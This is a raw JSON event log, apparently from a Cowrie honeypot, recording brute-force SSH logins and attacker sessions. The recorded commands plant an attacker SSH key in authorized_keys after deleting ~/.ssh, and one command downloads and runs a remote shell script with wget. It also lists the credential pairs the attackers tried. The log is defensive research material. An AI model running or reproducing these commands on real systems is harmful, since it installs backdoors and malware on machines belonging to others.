{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:06:48.452213Z","src_ip":"212.227.235.229","session":"066a28be61de"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:06:49.504646Z","src_ip":"212.227.235.229","session":"066a28be61de"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":54038,"dst_ip":"1.2.3.4","dst_port":22,"session":"39371b8cf8b4","protocol":"ssh","message":"New connection: 45.88.8.186:54038 (1.2.3.4:22) [session: 39371b8cf8b4]","sensor":"my-vps","timestamp":"2025-08-26T16:06:49.611924Z"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:49.773911Z","src_ip":"212.227.235.229","session":"066a28be61de"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:49.774859Z","src_ip":"212.227.235.229","session":"0b86f1e3298f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:06:50.080513Z","src_ip":"45.88.8.186","session":"39371b8cf8b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:06:50.081312Z","src_ip":"45.88.8.186","session":"39371b8cf8b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Password2017","message":"login attempt [root/Password2017] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:06:52.124221Z","src_ip":"45.88.8.186","session":"39371b8cf8b4"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:06:52.634732Z","src_ip":"45.88.8.186","session":"39371b8cf8b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38328,"dst_ip":"1.2.3.4","dst_port":23,"session":"db95e1ad7d19","protocol":"telnet","message":"New connection: 212.227.125.160:38328 (1.2.3.4:23) [session: db95e1ad7d19]","sensor":"my-vps","timestamp":"2025-08-26T16:07:06.811829Z"}
{"eventid":"cowrie.session.closed","duration":12.954848051071167,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:07:19.766599Z","src_ip":"212.227.125.160","session":"db95e1ad7d19"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40878,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cf40fd5e595","protocol":"ssh","message":"New connection: 213.209.150.239:40878 (1.2.3.4:22) [session: 6cf40fd5e595]","sensor":"my-vps","timestamp":"2025-08-26T16:08:57.986974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:08:57.987908Z","src_ip":"213.209.150.239","session":"6cf40fd5e595"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T16:08:58.035036Z","src_ip":"213.209.150.239","session":"6cf40fd5e595"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:08:58.269443Z","src_ip":"213.209.150.239","session":"6cf40fd5e595"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":6625,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:6625","sensor":"my-vps","timestamp":"2025-08-26T16:08:58.317264Z","session":"6cf40fd5e595"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T16:08:58.367198Z","src_ip":"213.209.150.239","session":"6cf40fd5e595"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":7649,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:7649","sensor":"my-vps","timestamp":"2025-08-26T16:08:58.501517Z","session":"6cf40fd5e595"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T16:08:58.550144Z","src_ip":"213.209.150.239","session":"6cf40fd5e595"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:08:58.597856Z","src_ip":"213.209.150.239","session":"6cf40fd5e595"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51758,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8b40cfbf99d","protocol":"ssh","message":"New connection: 212.227.235.229:51758 (1.2.3.4:22) [session: f8b40cfbf99d]","sensor":"my-vps","timestamp":"2025-08-26T16:09:01.176841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:09:01.178278Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:09:01.485405Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer1234!@#$.","message":"login attempt [root/qwer1234!@#$.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:09:02.750765Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:09:03.445642Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T16:09:03.446310Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T16:09:03.447347Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:09:03.758257Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:09:04.397528Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T16:09:04.398482Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T16:09:04.707690Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:09:04.708656Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51772,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b37dff3549c","protocol":"ssh","message":"New connection: 212.227.235.229:51772 (1.2.3.4:22) [session: 4b37dff3549c]","sensor":"my-vps","timestamp":"2025-08-26T16:09:05.022779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:09:05.024537Z","src_ip":"212.227.235.229","session":"4b37dff3549c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:09:05.338769Z","src_ip":"212.227.235.229","session":"4b37dff3549c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T16:09:06.599927Z","src_ip":"212.227.235.229","session":"4b37dff3549c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:09:07.917428Z","src_ip":"212.227.235.229","session":"4b37dff3549c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51776,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfdb04f9d187","protocol":"ssh","message":"New connection: 212.227.235.229:51776 (1.2.3.4:22) [session: bfdb04f9d187]","sensor":"my-vps","timestamp":"2025-08-26T16:09:08.230103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:09:08.230799Z","src_ip":"212.227.235.229","session":"bfdb04f9d187"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T16:09:08.550071Z","src_ip":"212.227.235.229","session":"bfdb04f9d187"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:09:09.855512Z","src_ip":"212.227.235.229","session":"bfdb04f9d187"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:09:10.171035Z","src_ip":"212.227.235.229","session":"f8b40cfbf99d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:09:10.171860Z","src_ip":"212.227.235.229","session":"bfdb04f9d187"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46974,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d300904cf07","protocol":"ssh","message":"New connection: 212.227.235.229:46974 (1.2.3.4:22) [session: 7d300904cf07]","sensor":"my-vps","timestamp":"2025-08-26T16:09:54.059257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:09:54.163323Z","src_ip":"212.227.235.229","session":"7d300904cf07"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:09:54.168236Z","src_ip":"212.227.235.229","session":"7d300904cf07"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:09:55.030705Z","src_ip":"212.227.235.229","session":"7d300904cf07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:09:55.914308Z","src_ip":"212.227.235.229","session":"7d300904cf07"}
{"eventid":"cowrie.command.input","input":"wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","message":"CMD: wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","sensor":"my-vps","timestamp":"2025-08-26T16:09:55.915019Z","src_ip":"212.227.235.229","session":"7d300904cf07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","size":138,"shasum":"958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:09:56.022304Z","src_ip":"212.227.235.229","session":"7d300904cf07"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:09:56.125870Z","src_ip":"212.227.235.229","session":"7d300904cf07"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53762,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf01fd21a2e6","protocol":"ssh","message":"New connection: 217.72.205.35:53762 (1.2.3.4:22) [session: cf01fd21a2e6]","sensor":"my-vps","timestamp":"2025-08-26T16:10:50.271429Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:10:50.272596Z","src_ip":"217.72.205.35","session":"cf01fd21a2e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36402,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9e6c1f453c3","protocol":"ssh","message":"New connection: 212.227.235.229:36402 (1.2.3.4:22) [session: d9e6c1f453c3]","sensor":"my-vps","timestamp":"2025-08-26T16:10:51.995578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:10:52.005287Z","src_ip":"212.227.235.229","session":"d9e6c1f453c3"}
